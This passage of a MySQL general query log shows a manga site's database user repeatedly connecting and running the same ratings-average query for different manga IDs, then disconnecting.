(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330647009 Quit 330647010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330647010 Quit 330647011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330647011 Quit 330647012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330647012 Quit 330647013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330647013 Quit 330647014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330647014 Quit 330647015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330647015 Quit 330647016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330647016 Quit 330647017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330647017 Quit 330647018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330647018 Quit 330647019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330647019 Quit 330647020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330647020 Quit 330647021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330647021 Quit 330647022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330647022 Quit 330647023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330647023 Quit 330647024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330647024 Quit 330647025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330647025 Quit 330647026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330647026 Quit 330647027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330647027 Quit 330647028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330647028 Quit 330647029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330647029 Quit 330647030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330647030 Quit 330647031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330647031 Quit 330647032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330647032 Quit 330647033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330647033 Quit 330647034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330647034 Quit 330647035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330647035 Quit 330647036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330647036 Quit 330647037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330647037 Quit 330647038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330647038 Quit 330647039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330647039 Quit 330647040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330647040 Quit 330647041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330647041 Quit 330647042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330647042 Quit 330647043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330647043 Quit 330647044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330647044 Quit 330647045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330647045 Quit 330647046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330647046 Quit 330647047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330647047 Quit 330647048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330647048 Quit 330647049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330647049 Quit 330647050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330647050 Quit 330647051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330647051 Quit 330647052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330647052 Quit 330647053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330647053 Quit 330647054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330647054 Quit 330647055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330647055 Quit 330647056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330647056 Quit 330647057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330647057 Quit 330647058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330647058 Quit 330647059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330647059 Quit 330647060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330647060 Quit 330647061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330647061 Quit 330647062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330647062 Quit 330647063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330647063 Quit 330647064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330647064 Quit 330647065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330647065 Quit 330647066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330647066 Quit 330647067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330647067 Quit 330647068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330647068 Quit 330647069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330647069 Quit 330647070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330647070 Quit 330647071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330647071 Quit 330647072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330647072 Quit 330647073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330647073 Quit 330647074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330647074 Quit 330647075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330647075 Quit 330647076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330647076 Quit 330647077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330647077 Quit 330647078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330647078 Quit 330647079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330647079 Quit 330647080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330647080 Quit 330647081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330647081 Quit 330647082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330647082 Quit 330647083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330647083 Quit 330647084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330647084 Quit 330647085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330647085 Quit 330647086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330647086 Quit 330647087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330647087 Quit 330647088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330647088 Quit 330647089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330647089 Quit 330647090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330647090 Quit 330647091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330647091 Quit 330647092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330647092 Quit 330647093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330647093 Quit 330647094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330647094 Quit 330647095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330647095 Quit 330647096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330647096 Quit 330647097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330647097 Quit 330647098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330647098 Quit 330647099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330647099 Quit 330647100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330647100 Quit 330647101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330647101 Quit 330647102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330647102 Quit 330647103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330647103 Quit 330647104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330647104 Quit 330647105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330647105 Quit 330647106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330647106 Quit 330647107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330647107 Quit 330647108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330647108 Quit 330647109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330647109 Quit 330647110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330647110 Quit 330647111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330647111 Quit 330647112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330647112 Quit 330647113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330647113 Quit 330647114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330647114 Quit 330647115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330647115 Quit 330647116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330647116 Quit 330647117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330647117 Quit 330647118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330647118 Quit 330647119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330647119 Quit 330647120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330647120 Quit 330647121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330647121 Quit 330647122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330647122 Quit 330647123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330647123 Quit 330647124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330647124 Quit 330647125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330647125 Quit 330647126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330647126 Quit 330647127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330647127 Quit 330647128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330647128 Quit 330647129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330647129 Quit 330647130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330647130 Quit 330647131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330647131 Quit 330647132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330647132 Quit 330647133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330647133 Quit 330647134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330647134 Quit 330647135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330647135 Quit 330647136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330647136 Quit 330647137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330647137 Quit 330647138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330647138 Quit 330647139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330647139 Quit 330647140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330647140 Quit 330647141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330647141 Quit 330647142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330647142 Quit 330647143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330647143 Quit 330647144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330647144 Quit 330647145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330647145 Quit 330647146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330647146 Quit 330647147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330647147 Quit 330647148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330647148 Quit 330647149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330647149 Quit 330647150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330647150 Quit 330647151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330647151 Quit 330647152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330647152 Quit 330647153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330647153 Quit 330647154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330647154 Quit 330647155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330647155 Quit 330647156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330647156 Quit 330647157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330647157 Quit 330647158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330647158 Quit 330647159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330647159 Quit 330647160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330647160 Quit 330647161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330647161 Quit 330647162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647162 Query select count(id) as total_rating, 